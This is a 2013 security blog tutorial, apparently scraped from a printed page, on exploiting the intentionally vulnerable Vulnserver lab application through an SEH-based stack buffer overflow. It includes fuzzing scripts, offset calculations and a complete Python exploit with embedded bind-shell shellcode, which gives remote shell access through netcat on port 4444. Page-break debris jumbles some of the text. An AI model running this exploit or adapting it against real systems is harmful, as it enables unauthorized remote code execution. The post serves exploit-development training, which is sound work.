SEH Exploitation to Get Shell Access | SecurityXploded Blog

http://nagareshwar.securityxploded.com/2013/09/16/seh-exploitation-to...

Home | Website | News | Forum

Sep 16 SEH

Exploitation to Get Shell Access

By sameerpatil on Sep 16 2013
Rating: +8 (from 8 votes)

Structured Exception Handling is a mechanism for handling both hardware and software exceptions in Windows OS. Structured exception handling enables us to have complete control over the handling of exceptions and it also provides support for debuggers as well. SEH exploitation is based on stack buffer overflow technique. It becomes easy to exploit a host by SEH when ASLR and DEP are not enabled. In this blog I will be exploiting the Vulnserver application. Vulnserver can be downloaded from here. My lab setup consists of: 1) Windows XP SP2 running Vulnserver, and Immunity Debugger to debug the application during runtime. 2) Backtrack R3 with Python 2.7.

Overview of Vulnserver.c Vulnserver package includes vulnserver.exe along with essfunc.dll. Source code files are also included to understand the working of the application. The code is pretty simple to understand. I have dragged out some important snippets which will be for our use.

…. #define DEFAULT_BUFLEN 4096 // Buffer Length: 4096 bytes …. …. char *RecvBuf = malloc(DEFAULT_BUFLEN); …. …. Result = recv(Client, RecvBuf, RecvBufLen, 0); if (Result > 0) { if (strncmp(RecvBuf, “GMON “, 5) == 0) { // checks for GMON command char GmonStatus[13] = “GMON STARTED\n”; for (i = 5; i < RecvBufLen; i++) {

1 of 13

9/18/2013 7:37 AM

SEH Exploitation to Get Shell Access | SecurityXploded Blog http://nagareshwar.. } The application accepts socket connection on port 9999 and receives data from client. sizeof(GmonStatus). …. GmonStatus. } } SendResult = send( Client. In SEH. RecvBuf can hold data of 4096 bytes whereas Buffer2S holds 2000 bytes only. SEH exploitation is possible only because 2 of 13 9/18/2013 7:37 AM . } Function3 uses strcpy to copy data into the buffer variable Buffer2S. if ((char)RecvBuf[i] == ‘/’) { if (strlen(RecvBuf) > 3950) { Function3(RecvBuf)... strcpy(Buffer2S. buffer overflow of 2096 bytes can be done here.com/2013/09/16/seh-exploitation-to. And. In the above snippet. 0 ). In the stack of any function. we see “GMON /” command accepts data of size more than 3950 characters which is then passed to Function3. // Buffer overflow vulnerable function. A Thread Dispatcher Stack is created for the current exception handler. …. exceptions are handled using special exception handlers which has a linked list structure. Hence. Strcpy being a buffer overflow vulnerable function doesn’t provide bounds check on the buffer size. the 3rd frame in the Thread Dispatcher Stack is the Establisher Frame. Input). } break. SEH chain is walked through to find which exception handler can handle the current exception. a pointer to exception registration record and a pointer to the next exception registration record are stored. void Function3(char *Input) { char Buffer2S[2000].securityxploded. When an exception occurs.

Now. let’s run the Vulnserver in Immunity debugger.SEH Exploitation to Get Shell Access | SecurityXploded Blog http://nagareshwar. SEH chain can be accessed by navigating in View->SEH Chain. socket. More details I will be discussing later.. let’s send random data of size more than 2000 bytes using a python program.dll module. 9999 )) print “sending data to client.SOCK_STREAM ) s.21.. The SEH chain will show the corrupt entry.21.connect(( “172.close() In the stack pane.” data = ‘GMON /’ data += “A” * 4000 s.. import socket s = socket. The current SE handler is present in Kernel32.securityxploded. 3 of 13 9/18/2013 7:37 AM .181”.AF_INET.send(data) s. we can see that the stack is being overflown by “A” character.com/2013/09/16/seh-exploitation-to.socket( socket. To begin with our exploitation. of the fact that Establisher Frame holds the address of the next exception registration record.

On further scrolling down the SE handler and next exception record can be seen.. …. We have to exploit in such a way that these two fields are overwritten by some other values.. Finding the right Offsets Pattern_create and pattern_offset tools can be used to find the exact offset as well as the bad characters involved.. we need to find the exact offset of the SE handler.SEH Exploitation to Get Shell Access | SecurityXploded Blog http://nagareshwar.com/2013/09/16/seh-exploitation-to. …. Put the generated shellcode as the data for exploitation.. But for this. data = ‘GMON /’ 4 of 13 9/18/2013 7:37 AM .securityxploded.

send(data) s.close() Get the values which were written on SE handler and pointer to next SEH record. Recheck the offsets Before we proceed further we need to confirm whether we got the right offsets to make sure the SEH chain is present at the same position on stack at every run.SEH Exploitation to Get Shell Access | SecurityXploded Blog http://nagareshwar.. data = ‘GMON /’ data += “A”* 3498 5 of 13 9/18/2013 7:37 AM .. The pointer to next SEH record is 3498 bytes away whereas SE handler is 3502 bytes away from our point of buffer overflow. data += “Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab……” s. The simplest way is by trying to overwrite the pointer to next SEH record and SE handler with different alphabets. ….securityxploded... The exact offset we can now find out using pattern_offset.com/2013/09/16/seh-exploitation-to. …. These values remain constant if ASLR (Address Space Layout Randomization) is not enabled.

when an exception occurs.dll which was included with Vulnserver appliation is not SAFESEH enabled. It should be taken care that the addresses doesn’t contain any possible bad characters ( eg.. Executing the “!mona. we will use any DLL which is not SAFESEH enabled. \x0a.dll. I will use Mona. Playing with SE handler As mentioned earlier. Any non-OS DLLs are basically not enabled with SAFESEH.py script for this. We search for a “Sequence of commands” in essfunc.send(data) s. \x00. we are on the right track now. we can see that essfunc.securityxploded. So if we execute two POP instructions. ESP points to Establisher frame and a final RETN instruction will get the control back to the next SEH entry on the old stack.py modules” command. data += “B” * 4 // overwrite pointer to next SEH record data += “C” * 4 //overwrite SE handler data += “A” * 505 s. To achieve this we have to overwrite SE handler with address to a location where POP-POP-RETN instruction is located. To find the POP-POP-RETN instruction sequence.. the TIB contains the Establisher frame in its 3rd offset address.SEH Exploitation to Get Shell Access | SecurityXploded Blog http://nagareshwar.close() Yes.com/2013/09/16/seh-exploitation-to. \x0d ) 6 of 13 9/18/2013 7:37 AM .

Now because of the Little Endian architecture of Intel machines.. which after exploitation will give us the shell access over a TCP connection. The PPR sequence I will use starts from the address \x625010B4. This shellcode will be put on the stack which will be executed and give us shell access.com/2013/09/16/seh-exploitation-to.. Msfpayload is the most suitable tool for generating shellcodes which can also be encoded by Shikata ga nai encoder to prevent it further from being detected by antivirus. But if 7 of 13 9/18/2013 7:37 AM . we have to write the addresses in reverse order (i.SEH Exploitation to Get Shell Access | SecurityXploded Blog http://nagareshwar. A shellcode of size 368 bytes is generated.e.securityxploded. Designing the final exploit code! The exploit I will use is the shell_bind_tcp. \xB4\x10\x50\x62 )..

. the shellcode is injected before the SE handler.connect((“172. In this concept. The short jump lands in a section of code which is designed in such a way that the injected shellcode is eventually called and executed.181″. and next SEH entry is overwritten with a short jump instruction. Hence only half of the shellcode could be inserted on the stack in such a situation.AF_INET.socket(socket.21.9999)) print “waiting fr a client” data=’GMON /’ data += “\x90″*2752 data += “\x90″*16 data += (“\xda\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x56\xb8\xb2\xc9\xdf” “\xe6\x31\x45\x18\x83\xed\xfc\x03\x45\xa6\x2b\x2a\x1a\x2e\x22″ “\xd5\xe3\xae\x55\x5f\x06\x9f\x47\x3b\x42\x8d\x57\x4f\x06\x3d” “\x13\x1d\xb3\xb6\x51\x8a\xb4\x7f\xdf\xec\xfb\x80\xd1\x30\x57″ “\x42\x73\xcd\xaa\x96\x53\xec\x64\xeb\x92\x29\x98\x03\xc6\xe2″ “\xd6\xb1\xf7\x87\xab\x09\xf9\x47\xa0\x31\x81\xe2\x77\xc5\x3b” “\xec\xa7\x75\x37\xa6\x5f\xfe\x1f\x17\x61\xd3\x43\x6b\x28\x58″ “\xb7\x1f\xab\x88\x89\xe0\x9d\xf4\x46\xdf\x11\xf9\x97\x27\x95″ “\xe1\xed\x53\xe5\x9c\xf5\xa7\x97\x7a\x73\x3a\x3f\x09\x23\x9e” “\xc1\xde\xb2\x55\xcd\xab\xb1\x32\xd2\x2a\x15\x49\xee\xa7\x98″ “\x9e\x66\xf3\xbe\x3a\x22\xa0\xdf\x1b\x8e\x07\xdf\x7c\x76\xf8″ “\x45\xf6\x95\xed\xfc\x55\xf2\xc2\x32\x66\x02\x4c\x44\x15\x30″ “\xd3\xfe\xb1\x78\x9c\xd8\x46\x7e\xb7\x9d\xd9\x81\x37\xde\xf0″ “\x45\x63\x8e\x6a\x6f\x0b\x45\x6b\x90\xde\xca\x3b\x3e\xb0\xaa” “\xeb\xfe\x60\x43\xe6\xf0\x5f\x73\x09\xdb\xd6\xb3\xc7\x3f\xbb” “\x53\x2a\xc0\x2a\xf8\xa3\x26\x26\x10\xe2\xf1\xde\xd2\xd1\xc9″ 8 of 13 9/18/2013 7:37 AM ..securityxploded. import socket s=socket.SEH Exploitation to Get Shell Access | SecurityXploded Blog http://nagareshwar.21. socket.com/2013/09/16/seh-exploitation-to. The only solution in this case is to use the Egg Hunter concept. the SE handler is present just a few bytes away from where the stack ends. we observe the stack pane.SOCK_STREAM) s.

So a short jump of 15 bytes is made which will land here: data += “\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF” This is a little complicated code being referred from [1].close() The above code may look complicated due to mathematical calculations involved in here..securityxploded. 9 of 13 9/18/2013 7:37 AM . But it’s easy to understand actually. The NOP sled comes handy when there is a chance to miss the exact offsets calculations by some bytes.send(data) s. And exactly 768 bytes offset in lower memory address the exploit of 368 bytes is being injected.com/2013/09/16/seh-exploitation-to. It basically makes a backward jump of 768 bytes by decrementing CX register 3 times. data += “\xEB\x0F\x90\x90″ // Pointer to next SEH record EB is the opcode for JMP instruction.SEH Exploitation to Get Shell Access | SecurityXploded Blog http://nagareshwar. The “\x90” is the NOP (no operation) instruction which tells CPU that no operation is to be done. “\x79\x2c\x30\x66\xd2\xba\x0c\x60\xe4\xc5\x8c\xa6\x47\x69\x24″ “\x21\x13\x61\xf1\x50\x24\xac\x51\x1a\x1d\x27\x2b\x72\xec\xd9″ “\x2c\x5f\x86\x7a\xbe\x04\x56\xf4\xa3\x92\x01\x51\x15\xeb\xc7″ “\x4f\x0c\x45\xf5\x8d\xc8\xae\xbd\x49\x29\x30\x3c\x1f\x15\x16″ “\x2e\xd9\x96\x12\x1a\xb5\xc0\xcc\xf4\x73\xbb\xbe\xae\x2d\x10″ “\x69\x26\xab\x5a\xaa\x30\xb4\xb6\x5c\xdc\x05\x6f\x19\xe3\xaa” “\xe7\xad\x9c\xd6\x97\x52\x77\x53\xa9\xa3\x45\x4e\x3e\x1a\x3c” “\x33\x22\x9d\xeb\x70\x5b\x1e\x19\x09\x98\x3e\x68\x0c\xe4\xf8″ “\x81\x7c\x75\x6d\xa5\xd3\x76\xa4″) data += “\x90″*362 data += “\xEB\x0F\x90\x90″ // Pointer to next SEH record data += “\xB4\x10\x50\x62″ // SE handler data += “\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF” data += “\x90″*500 s..

. Security Vulnerability. Vulnerability Research | 1 Comment One Response to “SEH Exploitation to Get Shell Access” 10 of 13 9/18/2013 7:37 AM ... Released DllHijackAuditor v2 with New & Smart Interception .com/2013/09/16/seh-exploitation-to. press SHIFT+F7.. Reverse Engineering. Computer Security.. To connect to the open TCP port 4444.securityxploded. And voila!! The shell is ours and we are free to exploit it further… References 1] SEH based Buffer OVerflow by Stephen Bradshaw 2] Introducing Vulnserver 3] Advanced Malware Analysis Training Session 2-Botnet Analysis Part 1 by Amit Malik Tweet You might also like: Book of the Month – A Guide to Kernel Exploitation M$ Patches First Security Vulnerability of 2010 Detecting ‘Slow Dll Hijacking’ Vulnerability using . The exploit code would be called after a series of jumps. Time to attack!! Our exploit code is ready now. use netcat.SEH Exploitation to Get Shell Access | SecurityXploded Blog http://nagareshwar.. iDefense kicks off new vulnerability research challenge for . To generate exception... LinkWithin Posted in Antivirus. Restart the application in Immunity and run the exploit.

1.securityxploded.SEH Exploitation to Get Shell Access | SecurityXploded Blog http://nagareshwar.py for creating and check patterns it’s a bit convenient and easy to detect bad chars best regards Trackback URI | Comments RSS | Twitter Leave a Reply Name (required) Mail (hidden) (required) Website New SecurityPhresh Beta Join us on Facebook Our Popular Tools WiFi Password Decryptor Product Key Decryptor 11 of 13 9/18/2013 7:37 AM . just few things.com/2013/09/16/seh-exploitation-to. on 16 Sep 2013 at 10:26 pm1doomedraven Hi.py who u don’t using mona. if you using Immunity debugger and mona. nice article...

Windows Password Kracker Spy DLL Remover Router Password Kracker Social Password Decryptor Spy BHO Remover Virus Total Scanner Browser Password Decryptor PDF Password Remover Recent Blog Posts SEH Exploitation to Get Shell Access Our Local Security Meet [14th September 2013] – Bangalore Bamital Analysis using Malpimp and Pymal Advanced Malware Analysis Training Session 8 – Introduction to Android Our Local Security Meet on 24th August 2013 – Bangalore Announcing Results for the Student Mentorship Programme-2013 Advanced Malware Analysis Training Session 7 – Malware Memory Forensics Advanced Malware Analysis Training Session 6 – Sandbox Analysis Mentorship Programme Application Form [2013-2014] Celebrating 6 years Malware Analysis Training Free Reverse Engineering & Malware Analysis Training Archives Search Blog Password Recovery Tools www.com/2013/09/16/seh-exploitation-to.SEH Exploitation to Get Shell Access | SecurityXploded Blog http://nagareshwar..com Anti-Spyware Tools Research Articles Security Training 12 of 13 9/18/2013 7:37 AM ..securityxploded.SecurityXploded.

.securityxploded. About | Contact 13 of 13 9/18/2013 7:37 AM ..com Presentations Security Books eBook Search SecurityXploded © 2007-2013 All Rights Reserved.NetCertScanner. Network Tools Online Tools Metasploit Modules wwww.SEH Exploitation to Get Shell Access | SecurityXploded Blog http://nagareshwar.com/2013/09/16/seh-exploitation-to.

Sign up to vote on this title
UsefulNot useful